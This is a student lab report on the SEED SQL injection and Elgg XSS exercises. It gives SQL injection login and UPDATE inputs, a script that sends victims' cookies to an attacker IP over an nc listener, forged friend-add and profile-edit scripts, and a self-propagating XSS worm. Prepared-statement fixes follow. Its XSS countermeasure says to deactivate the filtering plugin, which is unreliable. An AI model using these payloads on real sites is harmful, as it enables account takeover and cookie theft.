20231901 2023-2024-2 《网络攻防实践》实践十报告

20231901 2023-2024-2 《网络攻防实践》实践十报告

1.实践内容

一、SEED SQL注入攻击与防御实验

当前实验已经有一个Web应用程序，托管在 www.SEEDLabSQLInjection.com。该Web应用程序是一个简单的员工管理应用程序。员工可以通过此Web应用程序查看和更新数据库中的个人信息。
此Web应用程序主要有两个角色：

• 管理员是特权角色，可以管理每个员工的个人资料信息。
• 员工是一般角色，可以查看或更新自己的个人资料信息。

完成以下任务：

（1）熟悉SQL语句： 我们已经创建了一个名为Users的数据库，其中包含一个名为creditential的表。该表存储了每个员工的个人信息（例如，eid，密码，薪水，ssn等）。在此任务中，您需要使用数据库来熟悉SQL查询。

（2）对SELECT语句的SQL注入攻击：上述Web应用存在SQL输入漏洞，任务是在不知道密码的情况下登陆该Web应用程序。

（3）对UPDATE语句的SQL注入攻击：通过员工的更新个人界面实施UPDATE语句的SQL注入攻击。

（4）SQL对抗：修复上述SQL注入攻击漏洞。

二、SEED XSS跨站脚本攻击实验(Elgg)

为了演示攻击者可以利用XSS漏洞做什么，我们在预先构建的Ubuntu VM映像中设置了一个名为Elgg的Web应用程序。在本实验中，我们需要利用此漏洞对经过修改的Elgg发起XSS攻击，攻击的最终目的是在用户之间传播XSS蠕虫，这样，无论是谁查看的受感染用户个人资料都将被感染。具体过程如下：

• 发布恶意消息，显示警报窗口：在您的Elgg配置文件中嵌入一个JavaScript程序，以便当另一个用户查看您的配置文件时，将执行JavaScript程序并显示一个警报窗口。
• 弹窗显示cookie信息：将cookie信息显示。
• 窃取受害者的cookies：将cookie发送给攻击者。
• 成为受害者的朋友：使用js程序加受害者为朋友，无需受害者干预，使用相关的工具了解Elgg加好友的过程。
• 修改受害者的信息：使用js程序使得受害者在访问Alice的页面时，资料无需干预却被修改。
• 编写XSS蠕虫。
• 对抗XSS攻击。

2.实践过程

首先输入hostname huangdinyun修改姓名；

2.1 实验一：SEEDSQL注入攻击与防御实验

2.1.1 熟悉SQL语句

（1）首先输入指令：sudo service apache2 start，开启apache服务；

（2）输入指令：mysql -u root -pseedubuntu登入MYSQL数据库；接着输入指令：show databases; 查看数据库中的表（其中；不可省略）；

（3）输入指令：use Users;show tables;查看Users数据库中的所有表；

（4）输入指令：select * from credentials；，查看表格里的信息。由图可知，里面包含员工的ID、姓名、EID、Salary、birth等等信息；

2.1.2 对SELECT语句进行SQL注入攻击

（1）输入www.seedlabsqlinjection.com，打开已搭建好的网址；

（2）输入指令：CTRL+U，查看网页源码，得知用户输入信息通过get的方法提交至unsafe_home.php页面进行校验；

（3）分析php页面，在终端输入指令：cd /var/www/SQLInjection/；vim unsafe_home.php，可以得到程序针对普通用户以及Admin不同的处理方法；



（4）通过分析一下SQL语句，进行SQL注入攻击。考虑在用户名后加上'#，'作为闭合，#将后面的验证语句注释，从而达到攻击的目的；通过登录，验证猜想正确；

2.1.3 对Update语句攻击

（1）输入指令：cd /var/www/SQLInjection/；vim unsafe_edit_backend.php，找到源码中的update语句；


（2）通过2.1.2中的方法一样，输入的新昵称后加上"4’#，从而修改所有用户昵称；

2.1.4 SQL注入漏洞修复

（1）在SELECT语句中，使用bind_param方法，将参数与执行动作或条件分开进行修改；

$sql = $conn->prepare("SELECT id, name, eid, salary, birth, ssn, phoneNumber, address, email,nickname,Password FROM credential WHERE name= ? and Password= ?");
$sql->bind_param("ss", $input_uname, $hashed_pwd);

（2）在Update语句中，同样使用bind_param方法，将参数与执行动作或条件分开进行修改；

$sql = $conn->prepare("UPDATE credential SET nickname=?,email=?,address=?,PhoneNumber=? where ID=$id;");
$sql->bind_param("ssss", $input_nickname, $input_email,$input_address, $input_phonenumber);

2.2 实验二： SEED XSS跨站脚本攻击实验（Elgg）

2.2.1发布恶意消息，显示警报窗口

（1）输入www.xsslabelgg.com，进入已搭建好的页面；并试用账号Alice（密码seedalice）进行登录；

（2）点击头像进入主页，再点击Edit profile按钮，再Brief description窗口中输入xss攻击代码： <script> alert('20231901hdy');，进行攻击；保存后，弹出警告窗口；

2.2.2 弹窗显示cookie信息：将cookie显示

同2.2.1，在Brief description中输入代码：<script>alert(document.cookie);</script>，警告窗口弹出cookie信息；

2.2.3 窃取受害者的cookies:将cookie发送给攻击者

（1）首先在终端输入：ifconfig，查询攻击者ip地址为192.168.32.5；

（2）将攻击代码：<script>document.write('<img src=http://192.168.32.5:1901?c='+escape(document.cookie) + ' >');</script>，输入Brief description中，其中1901为端口；

（3）在终端处输入： nc -l 1901 -v，监听1901端口；登录账号：Boby（密码：seedboby），并添加Alice为好友；成功获取Boby的cookie；

2.2.4成为受害者的朋友：使用js程序加受害者为朋友，无需受害者干预，使用相关的工具了解Elgg加好友的过程

（1）输入：Ctrl+Shift+E，进入开发者模式，添加Samy为好友；通过查看add信息，得知申请参数包含id为47、时间戳为1715895365以及token；


（2）根据上述参数，构造添加好友xss攻击代码，并输入Alice中about me中edit HTML模式：

<script type="text/javascript">
window.onload = function () {
    var Ajax=null;
    var ts="&__elgg_ts="+elgg.security.token.__elgg_ts;
    var token="&__elgg_token="+elgg.security.token.__elgg_token;


    //Construct the HTTP request to add Samy as a friend.
    var sendurl="http://www.xsslabelgg.com/action/friends/add?friend=44" + ts + token;

    //Create and send Ajax request to add friend
    Ajax=new XMLHttpRequest();
    Ajax.open("GET",sendurl,true);
    Ajax.setRequestHeader("Host","www.xsslabelgg.com");
    Ajax.setRequestHeader("Content-Type","application/x-www-form-urlencoded");
    Ajax.send();
}
</script>

（3）登入Boby账号，先将Alice删除，界面如下：

（4）点击Alice头像，进入其主页，发现自动添加Alice为好友

（5）登录Samy账号（密码：seedsamy）测试，结果相同；

2.2.5 修改受害者信息

（1）构造修改信息xss攻击代码，并输入Alice中about me中edit HTML模式：

<script type="text/javascript">
	window.onload = function(){
		//JavaScript code to access user name, user guid, Time Stamp __elgg_ts
		//and Security Token __elgg_token
		var userName=elgg.session.user.name;
		var guid="&guid="+elgg.session.user.guid;
		var ts="&__elgg_ts="+elgg.security.token.__elgg_ts;
		var token="&__elgg_token="+elgg.security.token.__elgg_token;

		//Construct the content of your url.
		var content= token + ts + "name=" + userName + "&description=<p>I am 20231901hdy, I changed this content.</p> &accesslevel[description]=2&briefdescription=&accesslevel[briefdescription]=2&location=&accesslevel[location]=2&interests=&accesslevel[interests]=2&skills=&accesslevel[skills]=2&contactemail=&accesslevel[contactemail]=2&phone=&accesslevel[phone]=2&mobile=&accesslevel[mobile]=2&website=&accesslevel[website]=2&twitter=&accesslevel[twitter]=2" + guid;
		var sendurl = "http://www.xsslabelgg.com/action/profile/edit"
		alert(content)
		//FILL IN
		var samyGuid=44;
		//FILL IN
		if(elgg.session.user.guid!=samyGuid)
		{
			//Create and send Ajax request to modify profile
			var Ajax=null;
			Ajax=new XMLHttpRequest();
			Ajax.open("POST",sendurl,true);
			Ajax.setRequestHeader("Host","www.xsslabelgg.com");
			Ajax.setRequestHeader("Content-Type",
			"application/x-www-form-urlencoded");
			Ajax.send(content);
		}
	}
</script>

（2）同样登入Boby账号，访问Alice主页，发现访问后Boby主页about me部分被强制修改信息；

2.2.6 编写XSS蠕虫

（1）构造xss蠕虫攻击代码，并输入Alice中about me中edit HTML模式：

<script id="worm" type="text/javascript">
	window.onload = function(){
		var headerTag = "<script id=\'worm\' type=\'text/javascript\'>";
		var jsCode = document.getElementById("worm").innerHTML;
		var tailTag = "</" + "script>"; 
		var wormCode = encodeURIComponent(headerTag + jsCode + tailTag);

		var userName=elgg.session.user.name;
		var guid="&guid="+elgg.session.user.guid;
		var ts="&__elgg_ts="+elgg.security.token.__elgg_ts;
		var token="&__elgg_token="+elgg.security.token.__elgg_token;

		//Construct the content of your url.
		var content= token + ts + "&name=" + userName + "&description=<p>I am 20231901hdy, I changed this content."+ wormCode + "</p> &accesslevel[description]=2&briefdescription=&accesslevel[briefdescription]=2&location=&accesslevel[location]=2&interests=&accesslevel[interests]=2&skills=&accesslevel[skills]=2&contactemail=&accesslevel[contactemail]=2&phone=&accesslevel[phone]=2&mobile=&accesslevel[mobile]=2&website=&accesslevel[website]=2&twitter=&accesslevel[twitter]=2" + guid;
		var sendurl = "http://www.xsslabelgg.com/action/profile/edit"
		alert(content)

		var samyGuid=44;

		if(elgg.session.user.guid!=samyGuid)
		{
			var Ajax=null;
			Ajax=new XMLHttpRequest();
			Ajax.open("POST",sendurl,true);
			Ajax.setRequestHeader("Host","www.xsslabelgg.com");
			Ajax.setRequestHeader("Content-Type",
			"application/x-www-form-urlencoded");
			Ajax.send(content);
		}
		
	}
</script>

（2）登入Samy账号，访问已被感染的Boby账号，发现Samy主页的信息也被修改，因此Samy已被Boby传染；

2.2.7 XSS攻击的对抗措施

（1）登录Admin账号（密码：seedelgg），在主页中依次点击Account➡Administration➡plugins；

（2）找到插件HTMLawed，使其设为Deactivate状态，用以校验用户输入输出，删除特定标签；

（3）再次登录Boby账号，访问Alice界面，发现XSS蠕虫攻击已失效；

3.学习中遇到的问题及解决

• 问题1：SEED虚拟机无法从主机复制粘贴到虚拟机
• 解决方法：安装VMtools，见VMware Tools安装教程，或者通过虚拟机搜索得到相关资料，直接在虚拟机内复制。

4.实践总结

本次实验在老师的讲解下对sql注入和xxs蠕虫攻击有了一定的认识，尤其是在sql注入中，最近在做一个代码检测，检测代码是否存在sql注入漏洞，以及定位到问题代码行，目前现有的静态扫描工具在一定情况下存在无法检测sql漏洞误报问题，或者是虽然能检测出问题，但定位的代码行错误的问题，在这一块上还需要经过学习，利用更好的工具去检测出这样的问题，保护数据库安全。

参考资料

VMware Tools安装教程
XSS 攻击原理